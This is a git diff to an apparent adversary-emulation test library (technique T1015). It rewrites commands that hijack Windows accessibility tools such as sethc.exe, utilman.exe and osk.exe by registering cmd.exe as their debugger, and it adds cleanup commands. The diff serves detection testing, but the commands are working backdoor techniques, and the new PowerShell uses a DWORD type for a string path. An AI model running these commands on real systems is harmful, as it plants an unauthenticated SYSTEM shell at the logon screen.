diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md
index ddc960dd..0d61b1ca 100644
--- a/atomics/T1015/T1015.md
+++ b/atomics/T1015/T1015.md
@@ -48,12 +48,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | osk.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
+```
@@ -69,12 +84,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | sethc.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
+```
@@ -90,12 +120,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | utilman.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f
+```
@@ -111,12 +156,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | magnify.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f
+```
@@ -132,12 +192,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | narrator.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f
+```
@@ -153,12 +228,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f
+```
@@ -174,11 +264,26 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force | Out-Null
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f
+```
diff --git a/atomics/index.yaml b/atomics/index.yaml
index d45fda18..c9c29c2d 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -178,11 +178,23 @@ persistence:
type: String
default: osk.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
@@ -197,11 +209,23 @@ persistence:
type: String
default: sethc.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
@@ -216,11 +240,24 @@ persistence:
type: String
default: utilman.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
@@ -235,11 +272,24 @@ persistence:
type: String
default: magnify.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
@@ -254,11 +304,24 @@ persistence:
type: String
default: narrator.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
@@ -273,11 +336,24 @@ persistence:
type: String
default: DisplaySwitch.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
@@ -292,11 +368,24 @@ persistence:
type: String
default: atbroker.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force | Out-Null
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger
+ /f
'
T1098:
@@ -12754,11 +12843,23 @@ privilege-escalation:
type: String
default: osk.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
@@ -12773,11 +12874,23 @@ privilege-escalation:
type: String
default: sethc.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
@@ -12792,11 +12905,24 @@ privilege-escalation:
type: String
default: utilman.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
@@ -12811,11 +12937,24 @@ privilege-escalation:
type: String
default: magnify.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
@@ -12830,11 +12969,24 @@ privilege-escalation:
type: String
default: narrator.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
@@ -12849,11 +13001,24 @@ privilege-escalation:
type: String
default: DisplaySwitch.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
@@ -12868,11 +13033,24 @@ privilege-escalation:
type: String
default: atbroker.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force | Out-Null
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger
+ /f
'
'':